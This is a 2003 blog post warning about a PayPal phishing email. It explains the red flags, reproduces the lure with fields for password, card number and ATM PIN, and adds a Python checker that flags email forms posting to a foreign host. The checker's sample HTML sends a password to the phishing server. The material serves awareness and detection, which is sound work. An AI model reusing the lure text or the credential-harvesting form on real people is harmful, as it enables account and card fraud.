John C. Kirk (johnckirk) wrote,

PayPal hoax

Hmm, I wasn't intending to post another entry this soon, but I just got a rather worrying email. It appears to be from PayPal, but I think it's a hoax, so be very cautious if you receive something similar.

Key things that made me suspicious:


  • They are asking for my password, which PayPal say they will never do.

  • They shouldn't need my credit card number again, and giving a random person the number/expiration date would make it very easy for them to commit fraud (they could get my street address by logging into PayPal as me, once they have my email address and password).

  • They definitely shouldn't need my ATM PIN!

  • Although the email is dated tomorrow (Wed 4th June 2003), it says that it expires May 31, 2003.

  • General point - if I'm going to enter stuff like this, I'd rather do it at the website, than typing into an email form.



Once I got suspicious, I checked the source code of the message - although it appears to be from PayPal.com (according to the "from" email address), the form is set up to send its data to quiesy.portland.co.uk. And even if they are a registered subcontractor, a file called "boyz.php" doesn't sound very official to me. And finally, this email was sent to my old Demon address, rather than my new address (which is actually registered with PayPal, so the one that they'll use to contact me) - presumably this means that it's a wide scale thing, rather than anything that's specifically targeted at PayPal users.

Anyway, I've notified PayPal of this, and they should get back to me in a couple of days to confirm/deny.

So, assuming that I'm right, it's good to know that I'm getting less gullible as time goes by. In this case, I think it helps that we covered social engineering as part of the Cryptography/Information Security course, which I was revising a couple of weeks ago.

Oh, and one last thing - I've included the entire email below (behind the cut tags), so that you can see it for yourselves. This should be obvious, but please don't enter your details and click the "log in" button!



PayPal


Dear PayPal Customer

 


This e-mail is the notification of recent innovations taken by PayPal to detect inactive customers and non-functioning mailboxes.


The inactive customers are subject to restriction and removal in the next
3 months.


Please confirm your email address and and Credit Card info
number by logging in to your PayPal account
using the form below:





 



Email Address:
Password:
Full Name #: 
Credit Card #: 
Exp.Date(mm/yyyy) #: 
ATM PIN (For Bank Verification) #: 








This notification expires May 31, 2003


Thanks for using PayPal!

Tags: computers, paypal, scam, security
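
The source-code check described in the post (comparing the "from" domain with the host the form submits to) can be automated. The following is an added example, not part of the original post: the sample message is constructed from the details the post mentions, and the sender address, URL scheme and form field names are assumptions.

```python
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: host and file name are the ones named in the post;
# the sender address, URL scheme and field names are assumptions.
SAMPLE = """From: PayPal <notice@paypal.com>
To: user@example.org
Subject: Account notice
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

<html><body>
<form method="post" action="http://quiesy.portland.co.uk/boyz.php">
Email Address: <input type="text" name="email">
Password: <input type="password" name="password">
</form></body></html>
"""

class FormCollector(HTMLParser):
    """Record each <form> action and whether it contains a password input."""
    def __init__(self):
        super().__init__()
        self.forms = []  # one dict per form, in document order

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "password": False})
        elif tag == "input" and self.forms and (a.get("type") or "").lower() == "password":
            self.forms[-1]["password"] = True

def check_message(raw):
    """Return a finding for every HTML form that does not post to the From domain."""
    msg = message_from_string(raw)
    sender = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        text = part.get_payload(decode=True).decode(part.get_content_charset() or "utf-8", "replace")
        collector = FormCollector()
        collector.feed(text)
        for form in collector.forms:
            host = (urlsplit(form["action"]).hostname or "").lower()
            if not (sender and (host == sender or host.endswith("." + sender))):
                findings.append({"from_domain": sender, "form_host": host or None,
                                 "asks_password": form["password"]})
    return findings
```

Calling `check_message(SAMPLE)` reports the form because its target host is neither the From domain nor a subdomain of it. A form with a relative or missing action is also reported, with `form_host` set to `None`, since its destination cannot be tied to the sender.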